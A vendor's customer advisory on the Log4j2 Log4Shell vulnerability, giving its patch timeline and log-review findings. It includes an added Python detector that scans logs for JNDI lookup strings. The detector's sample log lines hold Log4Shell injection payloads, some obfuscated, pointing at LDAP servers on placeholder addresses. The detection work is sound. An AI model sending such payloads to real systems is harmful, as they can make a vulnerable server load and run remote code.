StreamShark Log4j2 Customer Advisory Regarding CVE-2021-44228
Summary:
We have reviewed all potentially impacted instances and, after a detailed review of application, system and audit logs, found no evidence of successful exploitation of this vulnerability on any StreamShark system; we were also unable to reproduce the exploit against the affected component. All hosts containing the vulnerable library were patched with a corrected version on 10 Dec 2021 (PM PST).
Timeline:
- 10 Dec 2021 (AM PST) CVE-2021-44228 published
- 10 Dec 2021 (PM PST) Vulnerable Log4j2 library patched by StreamShark on all hosts containing it
- 11 Dec 2021 (PM PST) Additional JVM configuration changes deployed to further harden settings against other potential attack vectors
Dear Customers,
On 10 Dec 2021 (AM PST) StreamShark became aware of CVE-2021-44228, a remote code execution vulnerability in a common Java logging framework, Apache Log4j2. Affected versions are Log4j2 2.0-beta9 through 2.14.1.
Across StreamShark’s own Java-based code, products and endpoints we have standardised on a different logging framework – Log4j2 is not used.
We also performed a detailed review across all other third-party libraries and services used in the hosting and delivery of StreamShark services across our Event and Scheduler capabilities.
A third-party software engine was identified as having a potentially vulnerable version of Log4j2 on a subset of our Live Event and Live Schedule ingests. These systems were patched the same day, 10 Dec 2021 (PM PST), with a corrected version of the library.
We have consulted with the vendor of the third-party software engine, who reviewed the details of this CVE in the context of their software to determine whether it poses a threat, and has not confirmed any active threat.
We independently tested the third-party software engine ourselves and could not replicate the attack vector or successfully exploit this vulnerability on a host that had not yet been patched for this CVE. Regardless, as noted, we patched all hosts containing the impacted library on 10 Dec 2021 (PM PST). We also identified further configuration changes to harden against other theoretical but uncommon attack vectors, which were deployed on 11 Dec 2021 (PM PST).
We have reviewed all potentially impacted instances and, after a detailed review of application, system and audit logs, found no evidence of successful exploitation of this vulnerability on any StreamShark system, nor were we able to reproduce it.
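The advisory does not describe how the log review was carried out. As an added illustration of the kind of check involved (this is example code, not StreamShark's tooling), the script below scans log lines for Log4Shell lookup strings, including the nested `${lower:...}` and `${...:-x}` obfuscations that a plain search for `${jndi:` would miss. The sample log lines are constructed for the example and use RFC 5737 documentation addresses; the pattern set is an assumption about common variants, not an exhaustive list.

```python
"""Scan log lines for Log4Shell (CVE-2021-44228) lookup strings, including
common obfuscations.  Added example; not StreamShark tooling.  The sample
log lines below are constructed and use RFC 5737 documentation addresses."""
import re
from typing import Dict, List

# Innermost lookups whose value can be recovered statically:
#   ${lower:J} / ${upper:j}   -> case-folded text
#   ${::-j} / ${env:NOPE:-j}  -> the default value "j" (the lookup itself fails)
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalization a real attempt reads ${jndi:<scheme>://host/...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:([^}]*)\}", re.IGNORECASE)


def normalize_lookup(text: str, max_rounds: int = 20) -> str:
    """Collapse nested ${...} obfuscation, innermost first, until stable."""
    for _ in range(max_rounds):
        folded = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            text,
        )
        folded = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), folded)
        if folded == text:
            break
        text = folded
    return text


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per line that carries a JNDI lookup after normalization."""
    hits = []
    for line_no, raw in enumerate(lines, start=1):
        norm = normalize_lookup(raw)
        m = _JNDI.search(norm)
        if m:
            hits.append({"line_no": line_no, "target": m.group(1).strip(),
                         "normalized": norm, "raw": raw})
    return hits


# Constructed sample lines (not real StreamShark logs).
SAMPLE_LOG_LINES = [
    'GET /live/ingest HTTP/1.1 ua="Mozilla/5.0" status=200',
    'GET /live/ingest HTTP/1.1 ua="${jndi:ldap://203.0.113.10:1389/a}" status=200',
    'GET / HTTP/1.1 ua="${${lower:j}ndi:ldap://203.0.113.10:1389/b}" status=404',
    'GET / HTTP/1.1 ua="${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://198.51.100.7/c}" status=404',
    'INFO  main  jndi lookups disabled; formatMsgNoLookups=true',
]

if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: jndi target {hit['target']}")
```

A hit shows an exploitation attempt, not a successful one: the string reaches the log whether or not the lookup fired. Evidence of success is an outbound LDAP, RMI or DNS connection from the JVM host to the address named in the lookup at the time of the request, which is why the host and network logs need to be correlated with the application log rather than searched alone.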
We continue to monitor the situation closely as new information comes to light. If further action is required, we will note it here.
Kind regards,
StreamShark Team